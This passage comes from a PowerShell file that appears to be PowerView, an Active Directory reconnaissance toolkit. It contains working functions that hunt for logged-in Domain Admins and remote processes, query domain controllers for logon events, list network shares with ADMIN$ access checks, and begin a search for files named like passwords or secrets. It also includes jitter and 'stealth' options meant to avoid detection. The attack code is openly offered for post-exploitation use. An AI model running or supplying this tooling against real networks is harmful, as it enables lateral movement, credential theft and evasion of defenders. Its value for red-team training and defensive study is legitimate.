user '$UserName'..." $User = New-Object PSObject if($TargetDomains) { $User | Add-Member Noteproperty 'MemberDomain' $TargetDomains[0] } else { $User | Add-Member Noteproperty 'MemberDomain' $Null } $User | Add-Member Noteproperty 'MemberName' $UserName.ToLower() $TargetUsers = @($User) } # read in a target user list if we have one elseif($UserFile) { $TargetUsers = Get-Content -Path $UserFile | ForEach-Object { $User = New-Object PSObject if($TargetDomains) { $User | Add-Member Noteproperty 'MemberDomain' $TargetDomains[0] } else { $User | Add-Member Noteproperty 'MemberDomain' $Null } $User | Add-Member Noteproperty 'MemberName' $_ $User } | Where-Object {$_} } elseif($UserADSpath -or $UserFilter -or $AdminCount) { ForEach ($Domain in $TargetDomains) { $Arguments = @{ 'Domain' = $Domain 'DomainController' = $DomainController 'ADSpath' = $UserADSpath 'Filter' = $UserFilter 'AdminCount' = $AdminCount 'AllowDelegation' = $AllowDelegation } Write-Verbose "[*] Querying domain $Domain for users" $TargetUsers += Get-NetUser @Arguments | ForEach-Object { $User = New-Object PSObject $User | Add-Member Noteproperty 'MemberDomain' $Domain $User | Add-Member Noteproperty 'MemberName' $_.samaccountname $User } | Where-Object {$_} } } else { ForEach ($Domain in $TargetDomains) { Write-Verbose "[*] Querying domain $Domain for users of group '$GroupName'" $TargetUsers += Get-NetGroupMember -GroupName $GroupName -Domain $Domain -DomainController $DomainController } } if (( (-not $ShowAll) -and (-not $ForeignUsers) ) -and ((!$TargetUsers) -or ($TargetUsers.Count -eq 0))) { throw "[!] No users found to search for!" } # script block that enumerates a server $HostEnumBlock = { param($ComputerName, $Ping, $TargetUsers, $CurrentUser, $Stealth, $DomainShortName, $Poll, $Delay, $Jitter) # optionally check if the server is up first $Up = $True if($Ping) { $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName } if($Up) { $Timer = [System.Diagnostics.Stopwatch]::StartNew() $RandNo = New-Object System.Random Do { if(!$DomainShortName) { # if we're not searching for foreign users, check session information $Sessions = Get-NetSession -ComputerName $ComputerName ForEach ($Session in $Sessions) { $UserName = $Session.sesi10_username $CName = $Session.sesi10_cname if($CName -and $CName.StartsWith("\\")) { $CName = $CName.TrimStart("\") } # make sure we have a result if (($UserName) -and ($UserName.trim() -ne '') -and (!($UserName -match $CurrentUser))) { $TargetUsers | Where-Object {$UserName -like $_.MemberName} | ForEach-Object { $IPAddress = @(Get-IPAddress -ComputerName $ComputerName)[0].IPAddress $FoundUser = New-Object PSObject $FoundUser | Add-Member Noteproperty 'UserDomain' $_.MemberDomain $FoundUser | Add-Member Noteproperty 'UserName' $UserName $FoundUser | Add-Member Noteproperty 'ComputerName' $ComputerName $FoundUser | Add-Member Noteproperty 'IPAddress' $IPAddress $FoundUser | Add-Member Noteproperty 'SessionFrom' $CName # Try to resolve the DNS hostname of $Cname try { $CNameDNSName = [System.Net.Dns]::GetHostEntry($CName) | Select-Object -ExpandProperty HostName $FoundUser | Add-Member NoteProperty 'SessionFromName' $CnameDNSName } catch { $FoundUser | Add-Member NoteProperty 'SessionFromName' $Null } # see if we're checking to see if we have local admin access on this machine if ($CheckAccess) { $Admin = Invoke-CheckLocalAdminAccess -ComputerName $CName $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin } else { $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Null } $FoundUser.PSObject.TypeNames.Add('PowerView.UserSession') $FoundUser } } } } if(!$Stealth) { # if we're not 'stealthy', enumerate loggedon users as well $LoggedOn = Get-NetLoggedon -ComputerName $ComputerName ForEach ($User in $LoggedOn) { $UserName = $User.wkui1_username # TODO: translate domain to authoratative name # then match domain name ? $UserDomain = $User.wkui1_logon_domain # make sure wet have a result if (($UserName) -and ($UserName.trim() -ne '')) { $TargetUsers | Where-Object {$UserName -like $_.MemberName} | ForEach-Object { $Proceed = $True if($DomainShortName) { if ($DomainShortName.ToLower() -ne $UserDomain.ToLower()) { $Proceed = $True } else { $Proceed = $False } } if($Proceed) { $IPAddress = @(Get-IPAddress -ComputerName $ComputerName)[0].IPAddress $FoundUser = New-Object PSObject $FoundUser | Add-Member Noteproperty 'UserDomain' $UserDomain $FoundUser | Add-Member Noteproperty 'UserName' $UserName $FoundUser | Add-Member Noteproperty 'ComputerName' $ComputerName $FoundUser | Add-Member Noteproperty 'IPAddress' $IPAddress $FoundUser | Add-Member Noteproperty 'SessionFrom' $Null $FoundUser | Add-Member Noteproperty 'SessionFromName' $Null # see if we're checking to see if we have local admin access on this machine if ($CheckAccess) { $Admin = Invoke-CheckLocalAdminAccess -ComputerName $ComputerName $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin } else { $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Null } $FoundUser.PSObject.TypeNames.Add('PowerView.UserSession') $FoundUser } } } } } if ($Poll -gt 0) { Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) } } While ($Poll -gt 0 -and $Timer.Elapsed.TotalSeconds -lt $Poll) } } } process { if($Threads) { Write-Verbose "Using threading with threads = $Threads" # if we're using threading, kick off the script block with Invoke-ThreadedFunction $ScriptParams = @{ 'Ping' = $(-not $NoPing) 'TargetUsers' = $TargetUsers 'CurrentUser' = $CurrentUser 'Stealth' = $Stealth 'DomainShortName' = $DomainShortName 'Poll' = $Poll 'Delay' = $Delay 'Jitter' = $Jitter } # kick off the threaded script block + arguments Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads } else { if(-not $NoPing -and ($ComputerName.count -ne 1)) { # ping all hosts in parallel $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}} $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100 } Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)" $Counter = 0 $RandNo = New-Object System.Random ForEach ($Computer in $ComputerName) { $Counter = $Counter + 1 # sleep for our semi-randomized interval Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))" $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False, $TargetUsers, $CurrentUser, $Stealth, $DomainShortName, 0, 0, 0 $Result if($Result -and $StopOnSuccess) { Write-Verbose "[*] Target user found, returning early" return } } } } } function Invoke-StealthUserHunter { [CmdletBinding()] param( [Parameter(Position=0,ValueFromPipeline=$True)] [Alias('Hosts')] [String[]] $ComputerName, [ValidateScript({Test-Path -Path $_ })] [Alias('HostList')] [String] $ComputerFile, [String] $ComputerFilter, [String] $ComputerADSpath, [String] $GroupName = 'Domain Admins', [String] $TargetServer, [String] $UserName, [String] $UserFilter, [String] $UserADSpath, [ValidateScript({Test-Path -Path $_ })] [String] $UserFile, [Switch] $CheckAccess, [Switch] $StopOnSuccess, [Switch] $NoPing, [UInt32] $Delay = 0, [Double] $Jitter = .3, [String] $Domain, [Switch] $ShowAll, [Switch] $SearchForest, [String] [ValidateSet("DFS","DC","File","All")] $StealthSource ="All" ) # kick off Invoke-UserHunter with stealth options Invoke-UserHunter -Stealth @PSBoundParameters } function Invoke-ProcessHunter { <# .SYNOPSIS Query the process lists of remote machines, searching for processes with a specific name or owned by a specific user. Thanks to @paulbrandau for the approach idea. Author: @harmj0y License: BSD 3-Clause .PARAMETER ComputerName Host array to enumerate, passable on the pipeline. .PARAMETER ComputerFile File of hostnames/IPs to search. .PARAMETER ComputerFilter Host filter name to query AD for, wildcards accepted. .PARAMETER ComputerADSpath The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER ProcessName The name of the process to hunt, or a comma separated list of names. .PARAMETER GroupName Group name to query for target users. .PARAMETER TargetServer Hunt for users who are effective local admins on a target server. .PARAMETER UserName Specific username to search for. .PARAMETER UserFilter A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)" .PARAMETER UserADSpath The LDAP source to search through for users, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER UserFile File of usernames to search for. .PARAMETER StopOnSuccess Switch. Stop hunting after finding after finding a target user/process. .PARAMETER NoPing Switch. Don't ping each host to ensure it's up before enumerating. .PARAMETER Delay Delay between enumerating hosts, defaults to 0 .PARAMETER Jitter Jitter for the host delay, defaults to +/- 0.3 .PARAMETER Domain Domain for query for machines, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ShowAll Switch. Return all user location results. .PARAMETER SearchForest Switch. Search all domains in the forest for target users instead of just a single domain. .PARAMETER Threads The maximum concurrent threads to execute. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target machine/domain. .EXAMPLE PS C:\> Invoke-ProcessHunter -Domain 'testing' Finds machines on the 'testing' domain where domain admins have a running process. .EXAMPLE PS C:\> Invoke-ProcessHunter -Threads 20 Multi-threaded process hunting, replaces Invoke-ProcessHunterThreaded. .EXAMPLE PS C:\> Invoke-ProcessHunter -UserFile users.txt -ComputerFile hosts.txt Finds machines in hosts.txt where any members of users.txt have running processes. .EXAMPLE PS C:\> Invoke-ProcessHunter -GroupName "Power Users" -Delay 60 Find machines on the domain where members of the "Power Users" groups have running processes with a 60 second (+/- *.3) randomized delay between touching each host. .LINK http://blog.harmj0y.net #> [CmdletBinding()] param( [Parameter(Position=0,ValueFromPipeline=$True)] [Alias('Hosts')] [String[]] $ComputerName, [ValidateScript({Test-Path -Path $_ })] [Alias('HostList')] [String] $ComputerFile, [String] $ComputerFilter, [String] $ComputerADSpath, [String] $ProcessName, [String] $GroupName = 'Domain Admins', [String] $TargetServer, [String] $UserName, [String] $UserFilter, [String] $UserADSpath, [ValidateScript({Test-Path -Path $_ })] [String] $UserFile, [Switch] $StopOnSuccess, [Switch] $NoPing, [UInt32] $Delay = 0, [Double] $Jitter = .3, [String] $Domain, [String] $DomainController, [Switch] $ShowAll, [Switch] $SearchForest, [ValidateRange(1,100)] [Int] $Threads, [Management.Automation.PSCredential] $Credential ) begin { if ($PSBoundParameters['Debug']) { $DebugPreference = 'Continue' } # random object for delay $RandNo = New-Object System.Random Write-Verbose "[*] Running Invoke-ProcessHunter with delay of $Delay" ##################################################### # # First we build the host target set # ##################################################### # if we're using a host list, read the targets in and add them to the target list if($ComputerFile) { $ComputerName = Get-Content -Path $ComputerFile } if(!$ComputerName) { [array]$ComputerName = @() if($Domain) { $TargetDomains = @($Domain) } elseif($SearchForest) { # get ALL the domains in the forest to search $TargetDomains = Get-NetForestDomain -DomainController $DomainController -Credential $Credential | ForEach-Object { $_.Name } } else { # use the local domain $TargetDomains = @( (Get-NetDomain -Domain $Domain -Credential $Credential).name ) } ForEach ($Domain in $TargetDomains) { Write-Verbose "[*] Querying domain $Domain for hosts" $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -Filter $ComputerFilter -ADSpath $ComputerADSpath } # remove any null target hosts, uniquify the list and shuffle it $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random } if($($ComputerName.Count) -eq 0) { throw "No hosts found!" } } ##################################################### # # Now we build the user target set # ##################################################### if(!$ProcessName) { Write-Verbose "No process name specified, building a target user set" # users we're going to be searching for $TargetUsers = @() # if we want to hunt for the effective domain users who can access a target server if($TargetServer) { Write-Verbose "Querying target server '$TargetServer' for local users" $TargetUsers = Get-NetLocalGroup $TargetServer -Recurse | Where-Object {(-not $_.IsGroup) -and $_.IsDomain } | ForEach-Object { ($_.AccountName).split("/")[1].toLower() } | Where-Object {$_} } # if we get a specific username, only use that elseif($UserName) { Write-Verbose "[*] Using target user '$UserName'..." $TargetUsers = @( $UserName.ToLower() ) } # read in a target user list if we have one elseif($UserFile) { $TargetUsers = Get-Content -Path $UserFile | Where-Object {$_} } elseif($UserADSpath -or $UserFilter) { ForEach ($Domain in $TargetDomains) { Write-Verbose "[*] Querying domain $Domain for users" $TargetUsers += Get-NetUser -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $UserADSpath -Filter $UserFilter | ForEach-Object { $_.samaccountname } | Where-Object {$_} } } else { ForEach ($Domain in $TargetDomains) { Write-Verbose "[*] Querying domain $Domain for users of group '$GroupName'" $TargetUsers += Get-NetGroupMember -GroupName $GroupName -Domain $Domain -DomainController $DomainController -Credential $Credential| ForEach-Object { $_.MemberName } } } if ((-not $ShowAll) -and ((!$TargetUsers) -or ($TargetUsers.Count -eq 0))) { throw "[!] No users found to search for!" } } # script block that enumerates a server $HostEnumBlock = { param($ComputerName, $Ping, $ProcessName, $TargetUsers, $Credential) # optionally check if the server is up first $Up = $True if($Ping) { $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName } if($Up) { # try to enumerate all active processes on the remote host # and search for a specific process name $Processes = Get-NetProcess -Credential $Credential -ComputerName $ComputerName -ErrorAction SilentlyContinue ForEach ($Process in $Processes) { # if we're hunting for a process name or comma-separated names if($ProcessName) { $ProcessName.split(",") | ForEach-Object { if ($Process.ProcessName -match $_) { $Process } } } # if the session user is in the target list, display some output elseif ($TargetUsers -contains $Process.User) { $Process } } } } } process { if($Threads) { Write-Verbose "Using threading with threads = $Threads" # if we're using threading, kick off the script block with Invoke-ThreadedFunction $ScriptParams = @{ 'Ping' = $(-not $NoPing) 'ProcessName' = $ProcessName 'TargetUsers' = $TargetUsers 'Credential' = $Credential } # kick off the threaded script block + arguments Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads } else { if(-not $NoPing -and ($ComputerName.count -ne 1)) { # ping all hosts in parallel $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}} $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100 } Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)" $Counter = 0 ForEach ($Computer in $ComputerName) { $Counter = $Counter + 1 # sleep for our semi-randomized interval Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))" $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False, $ProcessName, $TargetUsers, $Credential $Result if($Result -and $StopOnSuccess) { Write-Verbose "[*] Target user/process found, returning early" return } } } } } function Invoke-EventHunter { <# .SYNOPSIS Queries all domain controllers on the network for account logon events (ID 4624) and TGT request events (ID 4768), searching for target users. Note: Domain Admin (or equiv) rights are needed to query this information from the DCs. Author: @sixdub, @harmj0y License: BSD 3-Clause .PARAMETER ComputerName Host array to enumerate, passable on the pipeline. .PARAMETER ComputerFile File of hostnames/IPs to search. .PARAMETER ComputerFilter Host filter name to query AD for, wildcards accepted. .PARAMETER ComputerADSpath The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER GroupName Group name to query for target users. .PARAMETER TargetServer Hunt for users who are effective local admins on a target server. .PARAMETER UserName Specific username to search for. .PARAMETER UserFilter A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)" .PARAMETER UserADSpath The LDAP source to search through for users, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER UserFile File of usernames to search for. .PARAMETER NoPing Don't ping each host to ensure it's up before enumerating. .PARAMETER Domain Domain for query for machines, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER SearchDays Number of days back to search logs for. Default 3. .PARAMETER SearchForest Switch. Search all domains in the forest for target users instead of just a single domain. .PARAMETER Threads The maximum concurrent threads to execute. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Invoke-EventHunter .LINK http://blog.harmj0y.net #> [CmdletBinding()] param( [Parameter(Position=0,ValueFromPipeline=$True)] [Alias('Hosts')] [String[]] $ComputerName, [ValidateScript({Test-Path -Path $_ })] [Alias('HostList')] [String] $ComputerFile, [String] $ComputerFilter, [String] $ComputerADSpath, [String] $GroupName = 'Domain Admins', [String] $TargetServer, [String[]] $UserName, [String] $UserFilter, [String] $UserADSpath, [ValidateScript({Test-Path -Path $_ })] [String] $UserFile, [String] $Domain, [String] $DomainController, [Int32] $SearchDays = 3, [Switch] $SearchForest, [ValidateRange(1,100)] [Int] $Threads, [Management.Automation.PSCredential] $Credential ) begin { if ($PSBoundParameters['Debug']) { $DebugPreference = 'Continue' } # random object for delay $RandNo = New-Object System.Random Write-Verbose "[*] Running Invoke-EventHunter" if($Domain) { $TargetDomains = @($Domain) } elseif($SearchForest) { # get ALL the domains in the forest to search $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name } } else { # use the local domain $TargetDomains = @( (Get-NetDomain -Credential $Credential).name ) } ##################################################### # # First we build the host target set # ##################################################### if(!$ComputerName) { # if we're using a host list, read the targets in and add them to the target list if($ComputerFile) { $ComputerName = Get-Content -Path $ComputerFile } elseif($ComputerFilter -or $ComputerADSpath) { [array]$ComputerName = @() ForEach ($Domain in $TargetDomains) { Write-Verbose "[*] Querying domain $Domain for hosts" $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -Filter $ComputerFilter -ADSpath $ComputerADSpath } } else { # if a computer specifier isn't given, try to enumerate all domain controllers [array]$ComputerName = @() ForEach ($Domain in $TargetDomains) { Write-Verbose "[*] Querying domain $Domain for domain controllers" $ComputerName += Get-NetDomainController -LDAP -Domain $Domain -DomainController $DomainController -Credential $Credential | ForEach-Object { $_.dnshostname} } } # remove any null target hosts, uniquify the list and shuffle it $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random } if($($ComputerName.Count) -eq 0) { throw "No hosts found!" } } ##################################################### # # Now we build the user target set # ##################################################### # users we're going to be searching for $TargetUsers = @() # if we want to hunt for the effective domain users who can access a target server if($TargetServer) { Write-Verbose "Querying target server '$TargetServer' for local users" $TargetUsers = Get-NetLocalGroup $TargetServer -Recurse | Where-Object {(-not $_.IsGroup) -and $_.IsDomain } | ForEach-Object { ($_.AccountName).split("/")[1].toLower() } | Where-Object {$_} } # if we get a specific username, only use that elseif($UserName) { # Write-Verbose "[*] Using target user '$UserName'..." $TargetUsers = $UserName | ForEach-Object {$_.ToLower()} if($TargetUsers -isnot [System.Array]) { $TargetUsers = @($TargetUsers) } } # read in a target user list if we have one elseif($UserFile) { $TargetUsers = Get-Content -Path $UserFile | Where-Object {$_} } elseif($UserADSpath -or $UserFilter) { ForEach ($Domain in $TargetDomains) { Write-Verbose "[*] Querying domain $Domain for users" $TargetUsers += Get-NetUser -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $UserADSpath -Filter $UserFilter | ForEach-Object { $_.samaccountname } | Where-Object {$_} } } else { ForEach ($Domain in $TargetDomains) { Write-Verbose "[*] Querying domain $Domain for users of group '$GroupName'" $TargetUsers += Get-NetGroupMember -GroupName $GroupName -Domain $Domain -DomainController $DomainController -Credential $Credential | ForEach-Object { $_.MemberName } } } if (((!$TargetUsers) -or ($TargetUsers.Count -eq 0))) { throw "[!] No users found to search for!" } # script block that enumerates a server $HostEnumBlock = { param($ComputerName, $Ping, $TargetUsers, $SearchDays, $Credential) # optionally check if the server is up first $Up = $True if($Ping) { $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName } if($Up) { # try to enumerate if($Credential) { Get-UserEvent -ComputerName $ComputerName -Credential $Credential -EventType 'all' -DateStart ([DateTime]::Today.AddDays(-$SearchDays)) | Where-Object { # filter for the target user set $TargetUsers -contains $_.UserName } } else { Get-UserEvent -ComputerName $ComputerName -EventType 'all' -DateStart ([DateTime]::Today.AddDays(-$SearchDays)) | Where-Object { # filter for the target user set $TargetUsers -contains $_.UserName } } } } } process { if($Threads) { Write-Verbose "Using threading with threads = $Threads" # if we're using threading, kick off the script block with Invoke-ThreadedFunction $ScriptParams = @{ 'Ping' = $(-not $NoPing) 'TargetUsers' = $TargetUsers 'SearchDays' = $SearchDays 'Credential' = $Credential } # kick off the threaded script block + arguments Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads } else { if(-not $NoPing -and ($ComputerName.count -ne 1)) { # ping all hosts in parallel $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}} $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100 } Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)" $Counter = 0 ForEach ($Computer in $ComputerName) { $Counter = $Counter + 1 # sleep for our semi-randomized interval Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))" Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $(-not $NoPing), $TargetUsers, $SearchDays, $Credential } } } } function Invoke-ShareFinder { <# .SYNOPSIS This function finds the local domain name for a host using Get-NetDomain, queries the domain for all active machines with Get-NetComputer, then for each server it lists of active shares with Get-NetShare. Non-standard shares can be filtered out with -Exclude* flags. Author: @harmj0y License: BSD 3-Clause .PARAMETER ComputerName Host array to enumerate, passable on the pipeline. .PARAMETER ComputerFile File of hostnames/IPs to search. .PARAMETER ComputerFilter Host filter name to query AD for, wildcards accepted. .PARAMETER ComputerADSpath The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER ExcludeStandard Switch. Exclude standard shares from display (C$, IPC$, print$ etc.) .PARAMETER ExcludePrint Switch. Exclude the print$ share. .PARAMETER ExcludeIPC Switch. Exclude the IPC$ share. .PARAMETER CheckShareAccess Switch. Only display found shares that the local user has access to. .PARAMETER CheckAdmin Switch. Only display ADMIN$ shares the local user has access to. .PARAMETER NoPing Switch. Don't ping each host to ensure it's up before enumerating. .PARAMETER Delay Delay between enumerating hosts, defaults to 0. .PARAMETER Jitter Jitter for the host delay, defaults to +/- 0.3. .PARAMETER Domain Domain to query for machines, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER SearchForest Switch. Search all domains in the forest for target users instead of just a single domain. .PARAMETER Threads The maximum concurrent threads to execute. .EXAMPLE PS C:\> Invoke-ShareFinder -ExcludeStandard Find non-standard shares on the domain. .EXAMPLE PS C:\> Invoke-ShareFinder -Threads 20 Multi-threaded share finding, replaces Invoke-ShareFinderThreaded. .EXAMPLE PS C:\> Invoke-ShareFinder -Delay 60 Find shares on the domain with a 60 second (+/- *.3) randomized delay between touching each host. .EXAMPLE PS C:\> Invoke-ShareFinder -ComputerFile hosts.txt Find shares for machines in the specified hosts file. .LINK http://blog.harmj0y.net #> [CmdletBinding()] param( [Parameter(Position=0,ValueFromPipeline=$True)] [Alias('Hosts')] [String[]] $ComputerName, [ValidateScript({Test-Path -Path $_ })] [Alias('HostList')] [String] $ComputerFile, [String] $ComputerFilter, [String] $ComputerADSpath, [Switch] $ExcludeStandard, [Switch] $ExcludePrint, [Switch] $ExcludeIPC, [Switch] $NoPing, [Switch] $CheckShareAccess, [Switch] $CheckAdmin, [UInt32] $Delay = 0, [Double] $Jitter = .3, [String] $Domain, [String] $DomainController, [Switch] $SearchForest, [ValidateRange(1,100)] [Int] $Threads ) begin { if ($PSBoundParameters['Debug']) { $DebugPreference = 'Continue' } # random object for delay $RandNo = New-Object System.Random Write-Verbose "[*] Running Invoke-ShareFinder with delay of $Delay" # figure out the shares we want to ignore [String[]] $ExcludedShares = @('') if ($ExcludePrint) { $ExcludedShares = $ExcludedShares + "PRINT$" } if ($ExcludeIPC) { $ExcludedShares = $ExcludedShares + "IPC$" } if ($ExcludeStandard) { $ExcludedShares = @('', "ADMIN$", "IPC$", "C$", "PRINT$") } # if we're using a host file list, read the targets in and add them to the target list if($ComputerFile) { $ComputerName = Get-Content -Path $ComputerFile } if(!$ComputerName) { [array]$ComputerName = @() if($Domain) { $TargetDomains = @($Domain) } elseif($SearchForest) { # get ALL the domains in the forest to search $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name } } else { # use the local domain $TargetDomains = @( (Get-NetDomain).name ) } ForEach ($Domain in $TargetDomains) { Write-Verbose "[*] Querying domain $Domain for hosts" $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Filter $ComputerFilter -ADSpath $ComputerADSpath } # remove any null target hosts, uniquify the list and shuffle it $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random } if($($ComputerName.count) -eq 0) { throw "No hosts found!" } } # script block that enumerates a server $HostEnumBlock = { param($ComputerName, $Ping, $CheckShareAccess, $ExcludedShares, $CheckAdmin) # optionally check if the server is up first $Up = $True if($Ping) { $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName } if($Up) { # get the shares for this host and check what we find $Shares = Get-NetShare -ComputerName $ComputerName ForEach ($Share in $Shares) { Write-Verbose "[*] Server share: $Share" $NetName = $Share.shi1_netname $Remark = $Share.shi1_remark $Path = '\\'+$ComputerName+'\'+$NetName # make sure we get a real share name back if (($NetName) -and ($NetName.trim() -ne '')) { # if we're just checking for access to ADMIN$ if($CheckAdmin) { if($NetName.ToUpper() -eq "ADMIN$") { try { $Null = [IO.Directory]::GetFiles($Path) "\\$ComputerName\$NetName `t- $Remark" } catch { Write-Verbose "Error accessing path $Path : $_" } } } # skip this share if it's in the exclude list elseif ($ExcludedShares -NotContains $NetName.ToUpper()) { # see if we want to check access to this share if($CheckShareAccess) { # check if the user has access to this path try { $Null = [IO.Directory]::GetFiles($Path) "\\$ComputerName\$NetName `t- $Remark" } catch { Write-Verbose "Error accessing path $Path : $_" } } else { "\\$ComputerName\$NetName `t- $Remark" } } } } } } } process { if($Threads) { Write-Verbose "Using threading with threads = $Threads" # if we're using threading, kick off the script block with Invoke-ThreadedFunction $ScriptParams = @{ 'Ping' = $(-not $NoPing) 'CheckShareAccess' = $CheckShareAccess 'ExcludedShares' = $ExcludedShares 'CheckAdmin' = $CheckAdmin } # kick off the threaded script block + arguments Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads } else { if(-not $NoPing -and ($ComputerName.count -ne 1)) { # ping all hosts in parallel $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}} $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100 } Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)" $Counter = 0 ForEach ($Computer in $ComputerName) { $Counter = $Counter + 1 # sleep for our semi-randomized interval Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))" Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False, $CheckShareAccess, $ExcludedShares, $CheckAdmin } } } } function Invoke-FileFinder { <# .SYNOPSIS Finds sensitive files on the domain. Author: @harmj0y License: BSD 3-Clause .DESCRIPTION This function finds the local domain name for a host using Get-NetDomain, queries the domain for all active machines with Get-NetComputer, grabs the readable shares for each server, and recursively searches every share for files with specific keywords in the name. If a share list is passed, EVERY share is enumerated regardless of other options. .PARAMETER ComputerName Host array to enumerate, passable on the pipeline. .PARAMETER ComputerFile File of hostnames/IPs to search. .PARAMETER ComputerFilter Host filter name to query AD for, wildcards accepted. .PARAMETER ComputerADSpath The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER ShareList List if \\HOST\shares to search through. .PARAMETER Terms Terms to search for. .PARAMETER OfficeDocs Switch. Search for office documents (*.doc*, *.xls*, *.ppt*) .PARAMETER FreshEXEs Switch. Find .EXEs accessed within the last week. .PARAMETER LastAccessTime Only return files with a LastAccessTime greater than this date value. .PARAMETER LastWriteTime Only return files with a LastWriteTime greater than this date value. .PARAMETER CreationTime Only return files with a CreationDate greater than this date value. .PARAMETER IncludeC Switch. Include any C$ shares in recursive searching (default ignore). .PARAMETER IncludeAdmin Switch. Include any ADMIN$ shares in recursive searching (default ignore). .PARAMETER ExcludeFolders Switch. Exclude folders from the search results. .PARAMETER ExcludeHidden Switch. Exclude hidden files and folders from the search results. .PARAMETER CheckWriteAccess Switch. Only returns files the current user has write access to. .PARAMETER OutFile Output results to a specified csv output file. .PARAMETER NoClobber Switch. Don't overwrite any existing output file. .PARAMETER NoPing Switch. Don't ping each host to ensure it's up before enumerating. .PARAMETER Delay Delay between enumerating hosts, defaults to 0 .PARAMETER Jitter Jitter for the host delay, defaults to +/- 0.3 .PARAMETER Domain Domain to query for machines, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER SearchForest Search all domains in the forest for target users instead of just a single domain. .PARAMETER SearchSYSVOL Switch. Search for login scripts on the SYSVOL of the primary DCs for each specified domain. .PARAMETER Threads The maximum concurrent threads to execute. .PARAMETER UsePSDrive Switch. Mount target remote path with temporary PSDrives. .EXAMPLE PS C:\> Invoke-FileFinder Find readable files on the domain with 'pass', 'sensitive', 'secret', 'admin', 'login', or 'unattend*.xml' in the name, .EXAMPLE PS C:\> Invoke-FileFinder -Domain testing Find readable files on the 'testing' domain with 'pass', 'sensitive', 'secret', 'admin', 'login', or 